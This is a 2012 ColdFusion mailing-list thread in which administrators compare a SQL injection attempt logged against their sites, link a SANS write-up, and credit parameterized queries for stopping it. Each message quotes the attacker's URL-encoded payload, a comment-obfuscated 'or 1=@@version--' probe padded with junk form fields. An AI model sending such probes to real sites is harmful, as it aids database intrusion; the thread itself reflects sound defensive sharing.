RE: Another weird SQL Injection attempt
Hmmm. One of my sites also had this exact attack (and some variations tried about a dozen times) yesterday also. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_wi ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352792 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Another weird SQL Injection attempt
Never seen this before! Script in Application file, as usual, caught it before it got further... Here's what was tried: /index.cfm?action=dance.school%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--40version--=MSOTlPn_View=0MSOTlPn_ShowSettings=False%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29--MSOGallery_SelectedLibrary=MSOGallery_FilterString=MSOTlPn_Button=none__REQUESTDIGEST=MSOAuthoringConsole_FormContext=MSOAC_EditDuringWorkflow=MSOSPWebPartManager_DisplayModeName=BrowseMSOWebPartPage_Shared=MSOLayout_LayoutChanges=MSOLayout_InDesignMode=MSOSPWebPartManager_OldDisplayModeName=BrowseMSOSPWebPartManager_StartWebPartEditingName=falseASB_TextDT_Props=ASB_DateTimeDT_Props=Write%23%3B%23CreatedASB_ResType_Query=__VIEWSTATE=PostList%24ctl06%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl07%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl08%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl09%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl10%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl11%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl12%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl13%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl14%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl15%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl16%24ctl26%24ctl01=nochange00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%240=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%241=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%242=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%243=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%244=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%245=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%246=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%247=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%248=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%249=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2410=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2411=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2412=ctl00%24ContentP ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352784 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Another weird SQL Injection attempt
Just battled this today myself Here's some more information on it. https://isc.sans.edu/diary.html?storyid=12127 On 9/30/12 5:58 PM, Les Mizzell lesm...@bellsouth.net wrote: Never seen this before! Script in Application file, as usual, caught it before it got further... Here's what was tried: /index.cfm?action=dance.school%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40ve rsion--40version--=MSOTlPn_View=0MSOTlPn_ShowSettings=False%27%2F%2A%2A% 2For%2F%2A%2A%2F1%3D%40%40version%29--MSOGallery_SelectedLibrary=MSOGall ery_FilterString=MSOTlPn_Button=none__REQUESTDIGEST=MSOAuthoringConsole _FormContext=MSOAC_EditDuringWorkflow=MSOSPWebPartManager_DisplayModeNam e=BrowseMSOWebPartPage_Shared=MSOLayout_LayoutChanges=MSOLayout_InDesig nMode=MSOSPWebPartManager_OldDisplayModeName=BrowseMSOSPWebPartManager_S tartWebPartEditingName=falseASB_TextDT_Props=ASB_DateTimeDT_Props=Write% 23%3B%23CreatedASB_ResType_Query=__VIEWSTATE=PostList%24ctl06%24ctl26%24 ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostLis t%24ctl07%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl 03%24ctl00%24PostList%24ctl08%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr %24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl09%24ctl26%24ctl01=nochange ctl00%24ctl00%24bcr%24bcr%2 4ctl01%24ctl03%24ctl00%24PostList%24ctl10%24ctl26%24ctl01=nochangectl00%2 4ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl11%24ctl26%24ct l01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList% 24ctl12%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03 %24ctl00%24PostList%24ctl13%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%2 4bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl14%24ctl26%24ctl01=nochangec tl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl15%24ctl2 6%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24Pos tList%24ctl16%24ctl26%24ctl01=nochange00%24ContentPlaceHolder1%24FilterAdD efault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%240=ctl00%24Con tentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxL istMakeMore%241=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAd Car_ascxControl1%24checkBoxListMakeMore%242=ctl00%24ContentPlaceHolder1%2 4FilterAdDefault1%24filterA dCar_ascxControl1%24checkBoxListMakeMore%243=ctl00%24ContentPlaceHolder1% 24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%244= ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1% 24checkBoxListMakeMore%245=ctl00%24ContentPlaceHolder1%24FilterAdDefault1 %24filterAdCar_ascxControl1%24checkBoxListMakeMore%246=ctl00%24ContentPla ceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMake More%247=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_asc xControl1%24checkBoxListMakeMore%248=ctl00%24ContentPlaceHolder1%24Filter AdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%249=ctl00%24 ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkB oxListMakeMore%2410=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filt erAdCar_ascxControl1%24checkBoxListMakeMore%2411=ctl00%24ContentPlaceHold er1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2 412=ctl00%24ContentP ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352785 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Another weird SQL Injection attempt
Looks like the same attack tried my servers too - too bad for them it failed. Long Live CFQueryParam amongst other little tools. Oh, and running PostgreSQL database :-) Wil Genovese Sr. Web Application Developer/ Systems Administrator CF Webtools www.cfwebtools.com wilg...@trunkful.com www.trunkful.com On Sep 30, 2012, at 8:01 PM, Scott Slone wrote: Just battled this today myself Here's some more information on it. https://isc.sans.edu/diary.html?storyid=12127 On 9/30/12 5:58 PM, Les Mizzell lesm...@bellsouth.net wrote: Never seen this before! Script in Application file, as usual, caught it before it got further... Here's what was tried: /index.cfm?action=dance.school%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40ve rsion--40version--=MSOTlPn_View=0MSOTlPn_ShowSettings=False%27%2F%2A%2A% 2For%2F%2A%2A%2F1%3D%40%40version%29--MSOGallery_SelectedLibrary=MSOGall ery_FilterString=MSOTlPn_Button=none__REQUESTDIGEST=MSOAuthoringConsole _FormContext=MSOAC_EditDuringWorkflow=MSOSPWebPartManager_DisplayModeNam e=BrowseMSOWebPartPage_Shared=MSOLayout_LayoutChanges=MSOLayout_InDesig nMode=MSOSPWebPartManager_OldDisplayModeName=BrowseMSOSPWebPartManager_S tartWebPartEditingName=falseASB_TextDT_Props=ASB_DateTimeDT_Props=Write% 23%3B%23CreatedASB_ResType_Query=__VIEWSTATE=PostList%24ctl06%24ctl26%24 ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostLis t%24ctl07%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl 03%24ctl00%24PostList%24ctl08%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr %24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl09%24ctl26%24ctl01=nochange ctl00%24ctl00%24bcr%24bcr%2 4ctl01%24ctl03%24ctl00%24PostList%24ctl10%24ctl26%24ctl01=nochangectl00%2 4ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl11%24ctl26%24ct l01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList% 24ctl12%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03 %24ctl00%24PostList%24ctl13%24ctl26%24ctl01=nochangectl00%24ctl00%24bcr%2 4bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl14%24ctl26%24ctl01=nochangec tl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24PostList%24ctl15%24ctl2 6%24ctl01=nochangectl00%24ctl00%24bcr%24bcr%24ctl01%24ctl03%24ctl00%24Pos tList%24ctl16%24ctl26%24ctl01=nochange00%24ContentPlaceHolder1%24FilterAdD efault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%240=ctl00%24Con tentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxL istMakeMore%241=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAd Car_ascxControl1%24checkBoxListMakeMore%242=ctl00%24ContentPlaceHolder1%2 4FilterAdDefault1%24filterA dCar_ascxControl1%24checkBoxListMakeMore%243=ctl00%24ContentPlaceHolder1% 24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%244= ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1% 24checkBoxListMakeMore%245=ctl00%24ContentPlaceHolder1%24FilterAdDefault1 %24filterAdCar_ascxControl1%24checkBoxListMakeMore%246=ctl00%24ContentPla ceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMake More%247=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_asc xControl1%24checkBoxListMakeMore%248=ctl00%24ContentPlaceHolder1%24Filter AdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%249=ctl00%24 ContentPlaceHolder1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkB oxListMakeMore%2410=ctl00%24ContentPlaceHolder1%24FilterAdDefault1%24filt erAdCar_ascxControl1%24checkBoxListMakeMore%2411=ctl00%24ContentPlaceHold er1%24FilterAdDefault1%24filterAdCar_ascxControl1%24checkBoxListMakeMore%2 412=ctl00%24ContentP ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352786 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
